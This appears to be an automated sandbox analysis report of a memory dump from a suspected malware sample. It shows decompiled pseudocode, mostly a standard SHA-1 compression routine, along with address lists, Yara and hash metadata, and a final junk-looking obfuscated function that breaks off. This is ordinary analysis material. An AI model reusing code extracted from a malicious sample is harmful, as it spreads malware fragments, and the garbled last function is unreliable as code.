					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                    0x00409e4b
                                    0x00409e4f
                                    0x00409e51
                                    0x00409e51
                                    0x00409e54
                                    0x00409e76
                                    0x00409e9c
                                    0x00409ec2
                                    0x00409ee4
                                    0x00409eeb
                                    0x00409eee
                                    0x00409ef1
                                    0x00409efa
                                    0x00409f00
                                    0x00409f07
                                    0x00409f18
                                    0x00409f1b
                                    0x00409f1e
                                    0x00409f22
                                    0x00409f24
                                    0x00409f26
                                    0x00409f2f
                                    0x00409f32
                                    0x00409f35
                                    0x00409f40
                                    0x00409f46
                                    0x00409f48
                                    0x00409f48
                                    0x00409f4b
                                    0x00409f4e
                                    0x00409f4e
                                    0x00409f53
                                    0x00409f55
                                    0x00409f58
                                    0x00409f5b
                                    0x00409f61
                                    0x00409f64
                                    0x00409f67
                                    0x00409f70
                                    0x00409f76
                                    0x00409f7f
                                    0x00409f8e
                                    0x00409f95
                                    0x00409f98
                                    0x00409f9b
                                    0x00409fa4
                                    0x00409fa7
                                    0x00409faa
                                    0x00409fc2
                                    0x00409fc9
                                    0x00409fcb
                                    0x00409fce
                                    0x00409fd1
                                    0x00409fda
                                    0x00409fe1
                                    0x00409fe4
                                    0x00409fe7
                                    0x00409ff6
                                    0x00409ffd
                                    0x0040a000
                                    0x0040a003
                                    0x0040a00c
                                    0x0040a016
                                    0x0040a019
                                    0x0040a025
                                    0x0040a028
                                    0x0040a02f
                                    0x0040a032
                                    0x0040a035
                                    0x0040a03a
                                    0x0040a03d
                                    0x0040a046
                                    0x0040a057
                                    0x0040a05a
                                    0x0040a05d
                                    0x0040a064
                                    0x0040a067
                                    0x0040a06a
                                    0x0040a06d
                                    0x0040a06f
                                    0x0040a072
                                    0x0040a075
                                    0x0040a07e
                                    0x0040a083
                                    0x0040a083
                                    0x0040a098
                                    0x0040a09b
                                    0x0040a09e
                                    0x0040a0a5
                                    0x0040a0a8
                                    0x0040a0ab
                                    0x0040a0c0
                                    0x0040a0c7
                                    0x0040a0ca
                                    0x0040a0ce
                                    0x0040a0d1
                                    0x0040a0d6
                                    0x0040a0d9
                                    0x0040a0e8
                                    0x0040a0eb
                                    0x0040a0f2
                                    0x0040a0f5
                                    0x0040a0f8
                                    0x0040a0fb
                                    0x0040a0fe
                                    0x0040a106
                                    0x0040a114
                                    0x0040a117
                                    0x0040a11a
                                    0x0040a11a
                                    0x0040a121
                                    0x0040a124
                                    0x0040a127
                                    0x0040a12f
                                    0x0040a13d
                                    0x0040a140
                                    0x0040a147
                                    0x0040a14a
                                    0x0040a14d
                                    0x0040a150
                                    0x0040a153
                                    0x0040a15c
                                    0x0040a163
                                    0x0040a163
                                    0x0040a169
                                    0x0040a182
                                    0x0040a185
                                    0x0040a18c
                                    0x0040a18f
                                    0x0040a192
                                    0x0040a1a4
                                    0x0040a1ae
                                    0x0040a1b1
                                    0x0040a1ba
                                    0x0040a1bd
                                    0x0040a1c4
                                    0x0040a1c7
                                    0x0040a1cd
                                    0x0040a1e0
                                    0x0040a1e7
                                    0x0040a1ea
                                    0x0040a1ed
                                    0x0040a1f0
                                    0x0040a1f9
                                    0x0040a1fc
                                    0x0040a20f
                                    0x0040a212
                                    0x0040a21c
                                    0x0040a21f
                                    0x0040a221
                                    0x0040a22a
                                    0x0040a22d
                                    0x0040a240
                                    0x0040a246
                                    0x0040a249
                                    0x0040a250
                                    0x0040a252
                                    0x0040a255
                                    0x0040a258
                                    0x0040a25b
                                    0x0040a25e
                                    0x0040a261
                                    0x0040a26a
                                    0x0040a26f
                                    0x0040a272
                                    0x0040a272
                                    0x0040a285
                                    0x0040a288
                                    0x0040a28b
                                    0x0040a292
                                    0x0040a295
                                    0x0040a298
                                    0x0040a29b
                                    0x0040a2ae
                                    0x0040a2b1
                                    0x0040a2bc
                                    0x0040a2bf
                                    0x0040a2cb
                                    0x0040a2ce
                                    0x0040a2d4
                                    0x0040a2d7
                                    0x0040a2da
                                    0x0040a2e1
                                    0x0040a2f1
                                    0x0040a2f4
                                    0x0040a2fa
                                    0x0040a2fd
                                    0x0040a304
                                    0x0040a306
                                    0x0040a309
                                    0x0040a30c
                                    0x0040a30f
                                    0x0040a312
                                    0x0040a319
                                    0x0040a328
                                    0x0040a32b
                                    0x0040a332
                                    0x0040a335
                                    0x0040a338
                                    0x0040a33b
                                    0x0040a33e
                                    0x0040a341
                                    0x0040a344
                                    0x0040a34d
                                    0x0040a35e
                                    0x0040a366
                                    0x0040a36c
                                    0x0040a36f
                                    0x0040a371
                                    0x0040a374
                                    0x0040a377
                                    0x0040a384

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (
                                    • API String ID: 0-3887548279
                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                    • Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                    • Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409E3C, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E00409E3C(void* __eax, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t282;
				signed int* _t283;
				signed int _t284;
				signed int _t290;
				signed int _t293;
				signed int _t297;
				signed int _t300;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				signed int _t316;
				signed int _t324;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t340;
				signed int _t346;
				signed int _t347;
				signed int _t352;
				signed int _t360;
				signed int _t364;
				signed int _t365;
				signed int _t369;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t407;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t428;
				signed int _t431;
				signed int _t440;
				signed int _t442;
				signed int _t445;
				signed int _t453;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t479;
				signed int _t487;
				signed int _t488;
				signed int* _t489;
				signed int* _t492;
				signed int _t499;
				signed int _t502;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				signed int _t516;
				signed int _t517;
				signed int _t521;
				signed int _t533;
				signed int _t536;
				signed int _t543;
				void* _t549;
				void* _t551;

				_t549 = _t551;
				_t492 = _a4;
				_t360 = 0;
				_t5 =  &(_t492[7]); // 0x1b
				_t282 = _t5;
				do {
					 *(_t549 + _t360 * 4 - 0x14c) = ((( *(_t282 - 1) & 0x000000ff) << 0x00000008 |  *_t282 & 0x000000ff) << 0x00000008 | _t282[1] & 0x000000ff) << 0x00000008 | _t282[2] & 0x000000ff;
					 *(_t549 + _t360 * 4 - 0x148) = (((_t282[3] & 0x000000ff) << 0x00000008 | _t282[4] & 0x000000ff) << 0x00000008 | _t282[5] & 0x000000ff) << 0x00000008 | _t282[6] & 0x000000ff;
					 *(_t549 + _t360 * 4 - 0x144) = (((_t282[7] & 0x000000ff) << 0x00000008 | _t282[8] & 0x000000ff) << 0x00000008 | _t282[9] & 0x000000ff) << 0x00000008 | _t282[0xa] & 0x000000ff;
					 *(_t549 + _t360 * 4 - 0x140) = (((_t282[0xb] & 0x000000ff) << 0x00000008 | _t282[0xc] & 0x000000ff) << 0x00000008 | _t282[0xd] & 0x000000ff) << 0x00000008 | _t282[0xe] & 0x000000ff;
					_t360 = _t360 + 4;
					_t282 =  &(_t282[0x10]);
				} while (_t360 < 0x10);
				_t283 =  &_v304;
				_v8 = 0x10;
				do {
					_t407 =  *(_t283 - 0x18);
					_t468 =  *(_t283 - 0x14);
					_t364 =  *(_t283 - 0x20) ^ _t283[5] ^  *_t283 ^ _t407;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t283[9] =  *(_t283 - 0x1c) ^ _t283[6] ^ _t283[1] ^ _t468;
					_t283[8] = _t364;
					_t324 = _t283[7] ^  *(_t283 - 0x10) ^ _t283[2];
					_t283 =  &(_t283[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t49 =  &_v8;
					 *_t49 = _v8 - 1;
					_t283[6] = _t324 ^ _t407;
					_t283[7] =  *(_t283 - 0x1c) ^  *(_t283 - 4) ^ _t364 ^ _t468;
				} while ( *_t49 != 0);
				_t326 =  *_t492;
				_t284 = _t492[1];
				_t365 = _t492[2];
				_t412 = _t492[3];
				_v12 = _t326;
				_v16 = _t492[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t471 = _v8;
					_t499 = _t326 + ( !_t284 & _t412 | _t365 & _t284) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t329 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t412;
					_v12 = _t499;
					asm("rol esi, 0x5");
					_v8 = _t365;
					_t418 = _t499 + ( !_t329 & _t365 | _t284 & _t329) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t502 = _t284;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t369 = _v12;
					_v8 = _t329;
					_t331 = _v8;
					_v12 = _t418;
					asm("rol edx, 0x5");
					_t290 = _t418 + ( !_t369 & _t502 | _t329 & _t369) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t421 = _v12;
					_v16 = _t502;
					asm("ror ecx, 0x2");
					_v8 = _t369;
					_v12 = _t290;
					asm("rol eax, 0x5");
					_v16 = _t331;
					_t507 = _t290 + ( !_t421 & _t331 | _t369 & _t421) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t365 = _v12;
					_t293 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t421;
					_v12 = _t507;
					asm("rol esi, 0x5");
					_v16 = _t293;
					_t284 = _v12;
					_t510 = _t507 + ( !_t365 & _t293 | _t421 & _t365) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t412 = _v8;
					asm("ror ecx, 0x2");
					_t472 = _t471 + 5;
					_t326 = _t510;
					_v12 = _t326;
					_v8 = _t472;
				} while (_t472 < 0x14);
				_t473 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t412;
					_t513 = _t510 + (_t412 ^ _t365 ^ _t284) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t340 = _v12;
					_v12 = _t513;
					asm("rol esi, 0x5");
					_t428 = _t513 + (_t365 ^ _t284 ^ _t340) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t516 = _t284;
					_v16 = _t365;
					_t372 = _v12;
					_v12 = _t428;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t297 = _t428 + (_t284 ^ _t340 ^ _t372) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t431 = _v12;
					_v8 = _t340;
					_v8 = _t372;
					_v12 = _t297;
					asm("rol eax, 0x5");
					_t473 = _t473 + 5;
					_t365 = _v12;
					asm("ror edx, 0x2");
					_t149 = _t516 + 0x6ed9eba1; // 0x6ed9eb9f
					_t517 = _t297 + (_t340 ^ _v8 ^ _t431) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x154)) + _t149;
					_t300 = _v8;
					_v8 = _t431;
					_v12 = _t517;
					asm("rol esi, 0x5");
					_t412 = _v8;
					_t510 = _t517 + (_t300 ^ _v8 ^ _t365) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x150)) + _t340 + 0x6ed9eba1;
					_v16 = _t300;
					_t284 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t510;
				} while (_t473 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t412;
					asm("ror eax, 0x2");
					_t521 = ((_t365 | _t284) & _t412 | _t365 & _t284) +  *((intOrPtr*)(_t549 + _v8 * 4 - 0x14c)) + _t510 + _v16 - 0x70e44324;
					_t479 = _v12;
					_v12 = _t521;
					asm("rol esi, 0x5");
					_t346 = _v8;
					asm("ror edi, 0x2");
					_t440 = ((_t284 | _t479) & _t365 | _t284 & _t479) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x148)) + _t521 + _v16 - 0x70e44324;
					_v16 = _t365;
					_t376 = _v12;
					_v12 = _t440;
					asm("rol edx, 0x5");
					_v8 = _t284;
					_t442 = ((_t479 | _t376) & _t284 | _t479 & _t376) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x144)) + _t440 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t304 = _v12;
					_v8 = _t479;
					_v12 = _t442;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t533 = ((_t376 | _t304) & _t479 | _t376 & _t304) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x140)) + _t442 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t445 = _t376;
					_t365 = _v12;
					_v8 = _t445;
					_v12 = _t533;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t510 = ((_t304 | _t365) & _t445 | _t304 & _t365) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x13c)) + _t533 + _v16 - 0x70e44324;
					_t412 = _t304;
					_t284 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t510;
					_t347 = _t346 + 5;
					_v8 = _t347;
				} while (_t347 < 0x3c);
				_t487 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t488 = _v8;
					asm("ror eax, 0x2");
					_t536 = (_t412 ^ _t365 ^ _t284) +  *((intOrPtr*)(_t549 + _t487 * 4 - 0x14c)) + _t510 + _v16 - 0x359d3e2a;
					_t352 = _v12;
					_v16 = _t412;
					_v12 = _t536;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t453 = (_t365 ^ _t284 ^ _t352) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x148)) + _t536 + _v16 - 0x359d3e2a;
					_v16 = _t365;
					_t377 = _v12;
					_v12 = _t453;
					asm("rol edx, 0x5");
					_v16 = _t284;
					asm("ror ecx, 0x2");
					_t308 = (_t284 ^ _t352 ^ _t377) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x144)) + _t453 + _v16 - 0x359d3e2a;
					_t412 = _v12;
					_v12 = _t308;
					asm("rol eax, 0x5");
					_v16 = _t352;
					_t543 = (_t352 ^ _t377 ^ _t412) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x140)) + _t308 + _v16 - 0x359d3e2a;
					_t310 = _t377;
					_v8 = _t352;
					asm("ror edx, 0x2");
					_v8 = _t377;
					_t365 = _v12;
					_v12 = _t543;
					asm("rol esi, 0x5");
					_t487 = _t488 + 5;
					_t510 = (_t310 ^ _t412 ^ _t365) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x13c)) + _t543 + _v16 - 0x359d3e2a;
					_v16 = _t310;
					_t284 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t412;
					_v12 = _t510;
					_v8 = _t487;
				} while (_t487 < 0x50);
				_t489 = _a4;
				_t489[2] = _t489[2] + _t365;
				_t489[3] = _t489[3] + _t412;
				_t316 = _t489[4] + _v16;
				 *_t489 =  *_t489 + _t510;
				_t489[1] = _t489[1] + _t284;
				_t489[4] = _t316;
				_t489[0x17] = 0;
				return _t316;
			}

































































                                    0x00409e41
                                    0x00409e4b
                                    0x00409e4f
                                    0x00409e51
                                    0x00409e51
                                    0x00409e54
                                    0x00409e76
                                    0x00409e9c
                                    0x00409ec2
                                    0x00409ee4
                                    0x00409eeb
                                    0x00409eee
                                    0x00409ef1
                                    0x00409efa
                                    0x00409f00
                                    0x00409f07
                                    0x00409f18
                                    0x00409f1b
                                    0x00409f1e
                                    0x00409f22
                                    0x00409f24
                                    0x00409f26
                                    0x00409f2f
                                    0x00409f32
                                    0x00409f35
                                    0x00409f40
                                    0x00409f46
                                    0x00409f48
                                    0x00409f48
                                    0x00409f4b
                                    0x00409f4e
                                    0x00409f4e
                                    0x00409f53
                                    0x00409f55
                                    0x00409f58
                                    0x00409f5b
                                    0x00409f61
                                    0x00409f64
                                    0x00409f67
                                    0x00409f70
                                    0x00409f76
                                    0x00409f7f
                                    0x00409f8e
                                    0x00409f95
                                    0x00409f98
                                    0x00409f9b
                                    0x00409fa4
                                    0x00409fa7
                                    0x00409faa
                                    0x00409fc2
                                    0x00409fc9
                                    0x00409fcb
                                    0x00409fce
                                    0x00409fd1
                                    0x00409fda
                                    0x00409fe1
                                    0x00409fe4
                                    0x00409fe7
                                    0x00409ff6
                                    0x00409ffd
                                    0x0040a000
                                    0x0040a003
                                    0x0040a00c
                                    0x0040a016
                                    0x0040a019
                                    0x0040a025
                                    0x0040a028
                                    0x0040a02f
                                    0x0040a032
                                    0x0040a035
                                    0x0040a03a
                                    0x0040a03d
                                    0x0040a046
                                    0x0040a057
                                    0x0040a05a
                                    0x0040a05d
                                    0x0040a064
                                    0x0040a067
                                    0x0040a06a
                                    0x0040a06d
                                    0x0040a06f
                                    0x0040a072
                                    0x0040a075
                                    0x0040a07e
                                    0x0040a083
                                    0x0040a083
                                    0x0040a098
                                    0x0040a09b
                                    0x0040a09e
                                    0x0040a0a5
                                    0x0040a0a8
                                    0x0040a0ab
                                    0x0040a0c0
                                    0x0040a0c7
                                    0x0040a0ca
                                    0x0040a0ce
                                    0x0040a0d1
                                    0x0040a0d6
                                    0x0040a0d9
                                    0x0040a0e8
                                    0x0040a0eb
                                    0x0040a0f2
                                    0x0040a0f5
                                    0x0040a0f8
                                    0x0040a0fb
                                    0x0040a0fe
                                    0x0040a106
                                    0x0040a114
                                    0x0040a117
                                    0x0040a11a
                                    0x0040a11a
                                    0x0040a121
                                    0x0040a124
                                    0x0040a127
                                    0x0040a12f
                                    0x0040a13d
                                    0x0040a140
                                    0x0040a147
                                    0x0040a14a
                                    0x0040a14d
                                    0x0040a150
                                    0x0040a153
                                    0x0040a15c
                                    0x0040a163
                                    0x0040a163
                                    0x0040a169
                                    0x0040a182
                                    0x0040a185
                                    0x0040a18c
                                    0x0040a18f
                                    0x0040a192
                                    0x0040a1a4
                                    0x0040a1ae
                                    0x0040a1b1
                                    0x0040a1ba
                                    0x0040a1bd
                                    0x0040a1c4
                                    0x0040a1c7
                                    0x0040a1cd
                                    0x0040a1e0
                                    0x0040a1e7
                                    0x0040a1ea
                                    0x0040a1ed
                                    0x0040a1f0
                                    0x0040a1f9
                                    0x0040a1fc
                                    0x0040a20f
                                    0x0040a212
                                    0x0040a21c
                                    0x0040a21f
                                    0x0040a221
                                    0x0040a22a
                                    0x0040a22d
                                    0x0040a240
                                    0x0040a246
                                    0x0040a249
                                    0x0040a250
                                    0x0040a252
                                    0x0040a255
                                    0x0040a258
                                    0x0040a25b
                                    0x0040a25e
                                    0x0040a261
                                    0x0040a26a
                                    0x0040a26f
                                    0x0040a272
                                    0x0040a272
                                    0x0040a285
                                    0x0040a288
                                    0x0040a28b
                                    0x0040a292
                                    0x0040a295
                                    0x0040a298
                                    0x0040a29b
                                    0x0040a2ae
                                    0x0040a2b1
                                    0x0040a2bc
                                    0x0040a2bf
                                    0x0040a2cb
                                    0x0040a2ce
                                    0x0040a2d4
                                    0x0040a2d7
                                    0x0040a2da
                                    0x0040a2e1
                                    0x0040a2f1
                                    0x0040a2f4
                                    0x0040a2fa
                                    0x0040a2fd
                                    0x0040a304
                                    0x0040a306
                                    0x0040a309
                                    0x0040a30c
                                    0x0040a30f
                                    0x0040a312
                                    0x0040a319
                                    0x0040a328
                                    0x0040a32b
                                    0x0040a332
                                    0x0040a335
                                    0x0040a338
                                    0x0040a33b
                                    0x0040a33e
                                    0x0040a341
                                    0x0040a344
                                    0x0040a34d
                                    0x0040a35e
                                    0x0040a366
                                    0x0040a36c
                                    0x0040a36f
                                    0x0040a371
                                    0x0040a374
                                    0x0040a377
                                    0x0040a384

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (
                                    • API String ID: 0-3887548279
                                    • Opcode ID: 49610e05aef350d710da37f1abe264cb26659ea830e28cfeafb0a386cf071ac3
                                    • Instruction ID: 749f1f7fbe95814f77f12d63ba111dd9e14d87e5667683efdd12a01bcbcf9987
                                    • Opcode Fuzzy Hash: 49610e05aef350d710da37f1abe264cb26659ea830e28cfeafb0a386cf071ac3
                                    • Instruction Fuzzy Hash: F6021CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D9D8, Relevance: 1.6, Strings: 1, Instructions: 394COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 42%
                                    			E0041D9D8(signed int __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _t55;
				signed char _t56;
				signed int _t68;
				char _t74;
				signed int _t75;
				signed int _t80;
				void* _t90;
				signed int _t96;
				signed int _t100;
				signed int _t101;
				intOrPtr _t104;

				_t101 = _t100 ^  *0x30341ea3;
				_pop( *0x5a277811);
				 *0xb091fbf7 = _t104;
				asm("ror dword [0xadf26139], 0x6d");
				_pop( *0xb04becf);
				asm("adc [0x231874f3], edx");
				_t74 = (__ecx & 0x000000b2) -  *0xb3a40b30;
				_pop( *0xf32a96d3);
				 *0x2c0a89d7 = __ebx - 0x1b3e656f;
				_t55 = __eax ^ 0x0f4867e9 ^  *0xd6a31630;
				 *0xbcea4863 = _t74;
				asm("sbb [0x64925e64], esi");
				 *0xa906906 =  *0xa906906 << 0x52;
				_push( *0x2c0a89d7);
				 *0xec1cfe0d =  *0xec1cfe0d + _t55;
				 *0xd60dbadb =  *0xd60dbadb << 0xb0;
				_t80 = 0x6e901905;
				_pop(_t96);
				 *0x8c122b10 =  *0x8c122b10 << 0xcb;
				_pop( *0x3873a697);
				asm("rol byte [0xfdd7ce18], 0xf");
				asm("cmpsw");
				_t56 = _t55 ^  *0xe90e3add;
				_t68 = 0xe14c998f +  *0xa742a36b * 0xe3f9;
				_t75 = _t74 + 0xb3;
				asm("cmpsb");
				 *0x25658cf8 = _t101;
				_pop(_t105);
				if(_t75 < 0) {
					L1:
					 *0x3b97609 =  *0x3b97609 & _t105;
					_t80 = _t80 & 0x000000b2;
				} else {
					__ebp = 0x29109978;
					asm("sbb [0x1a6d70f7], ebp");
					asm("ror dword [0x92fab492], 0x14");
					 *0x9696412c =  *0x9696412c | __cl;
					__ah = __ah +  *0x9e18d4b7;
					asm("adc ebx, [0xb835b42b]");
					 *0xb63d4f9b =  *0xb63d4f9b & __esp;
					__esp =  *0x777339bd;
					asm("sbb ah, 0x14");
					__ecx =  *0x4168a16a * 0xb568;
					 *0x8e592e0e =  *0x8e592e0e ^ __edi;
					 *0x2a95fe3f = 0x6e901905;
					asm("ror dword [0x25658d0b], 0xc3");
					__esp = __ecx;
					if( *0x8e592e0e < 0) {
						goto L1;
					} else {
						__ecx = __ecx - 0x9e159978;
						__bl = __bl + 0xd0;
						__edx = __edx ^  *0x4656aeff;
						__esi = __esi & 0x77d7b1ce;
						__ch =  *0xb4c5a43c;
						 *0x1b0a4034 =  *0x1b0a4034 >> 0x7e;
						 *0x4513989 =  *0x4513989 ^ 0x6e901905;
						 *0x282f8199 =  *0x282f8199 ^ __edi;
						 *0xab65ddbe =  *0xab65ddbe | __ebx;
						asm("rcr byte [0xff5a3ba0], 0xcf");
						asm("stosb");
						_push( *0x6a6b7797);
						__ch =  *0xb4c5a43c |  *0x4d168ab0;
						__ecx = __ecx -  *0xe34d1364;
						if(__ecx >= 0) {
							goto L1;
						} else {
							 *0x66e1f973 =  *0x66e1f973 & __eax;
							asm("sbb [0x97d2fd85], ebx");
							__eax = __eax + 1;
							 *0x1cf10184 =  *0x1cf10184 << 0x90;
							__esi = __esi & 0xbadb4aec;
							 *0x5059931a =  *0x5059931a - __ah;
							__edx = 0x1cca2ec5;
							 *0xf3daf564 =  *0xf3daf564 << 0x2b;
							 *0x98e67a8f =  *0x98e67a8f << 0x68;
							__esp = 0x560a54d6;
							__ebp = 0x1d1f7d71;
							__edx =  *0xe34f9fa3;
							__ebx = __ebx +  *0xc72b3c4;
							asm("adc ebp, [0xf00d302d]");
							asm("sbb [0x276bb097], esi");
							_t24 = __edi;
							__edi =  *0x93d1d529;
							 *0x93d1d529 = _t24;
							__eax = __ecx;
							__ch = 0x14;
							asm("adc edx, 0x702bebb9");
							__esp = 0x560a54d6 -  *0x341ea30f;
							__ch = 0x00000014 ^  *0xe92d1b30;
							__edi =  *0x3b51a801;
							__ebp = 0x5324dcdf;
							asm("sbb ebp, 0x26005e64");
							if(0x14 > 0) {
								goto L1;
							} else {
								__ebx =  *0xa130347f * 0x662a;
								__ch = __ch |  *0x6b779cb1;
								__edx =  *0x188ab06a * 0xda1d;
								_push(__edi);
								 *0x9d463fe5 =  *0x9d463fe5 << 0xc1;
								__edi = __edi -  *0x93a19f95;
								 *0x7c753036 =  *0x7c753036 + __ebx;
								if( *0x7c753036 < 0) {
									goto L1;
								} else {
									 *0xb5624f72 =  *0xb5624f72 ^ __edi;
									asm("adc [0xf8d8b3b7], dl");
									_pop( *0x906ddd0b);
									 *0xf55648c =  *0xf55648c << 6;
									__ebx = 0x30341ea3 + __ebx;
									asm("sbb [0x33946310], bl");
									__ecx = __ecx +  *0xe2bc6a8e;
									asm("adc [0xf1d90a62], edi");
									_push(__ebx);
									 *0xd4c3ad80 = 0x14;
									asm("adc esp, [0xac95d813]");
									__ebp =  *0x67cd016b * 0x5345;
									__edi = __edi &  *0x2d08a4ea;
									__esi = __esi - 1;
									__al = __al | 0x000000b6;
									__edx = __edx &  *0xfc4a7e19;
									_t29 = __ebx;
									__ebx =  *0xe241b929;
									 *0xe241b929 = _t29;
									asm("sbb bh, [0xf08473f2]");
									asm("sbb cl, [0x630e54b3]");
									__ecx = __ecx - 0x91ef988c;
									if(__ecx < 0) {
										goto L1;
									} else {
										__ebp =  *0xa411587c * 0x5743;
										 *0xd7cf0f18 =  *0xd7cf0f18 >> 0x77;
										_push( *0xd7d170d9);
										asm("adc edx, 0xe8c8f436");
										_push(__esp);
										asm("adc esi, 0x4c25e031");
										 *0x63472704 =  *0x63472704 ^ __ah;
										_push( *0xf8d032b9);
										__ebp =  *0xa411587c * 0x5743 - 0x3d45b30b;
										asm("adc edi, 0xf4479ed");
										asm("rcl dword [0x30341ea3], 0xdf");
										__bh = __bh ^ 0x00000018;
										_push(__esp);
										asm("adc esi, 0xa3132a09");
										if(__bh != 0) {
											goto L1;
										} else {
											_push( *0x7cdc707b);
											asm("sbb eax, [0xf9be5d27]");
											asm("rol byte [0xea11e0c6], 0xbe");
											 *0xff8e1c9 = __dl;
											 *0x830975b1 =  *0x830975b1 + __al;
											asm("lodsd");
											asm("movsb");
											__cl = __cl &  *0x62b80e3c;
											 *0x89ee220c =  *0x89ee220c << 0xa5;
											__esi = __esi &  *0x82df5fbd;
											__ch = __ch -  *0xb588ca8;
											asm("sbb [0xc9b018d7], cl");
											__ah = __ah -  *0xec94aef2;
											 *0xa910a4ec =  *0xa910a4ec << 0xf5;
											asm("ror dword [0xddc227ed], 0x69");
											__edi = __edi + 1;
											__dl = __dl -  *0xd032b963;
											 *0x8ae216f8 =  *0x8ae216f8 << 0x80;
											__esi = __esi - 0xfca72f13;
											asm("scasb");
											 *0x9c5027fe =  *0x9c5027fe << 0x44;
											asm("sbb [0x17811c8a], bh");
											__edi = __edi ^ 0x11bae76c;
											 *0x2333afca =  *0x2333afca << 0xd1;
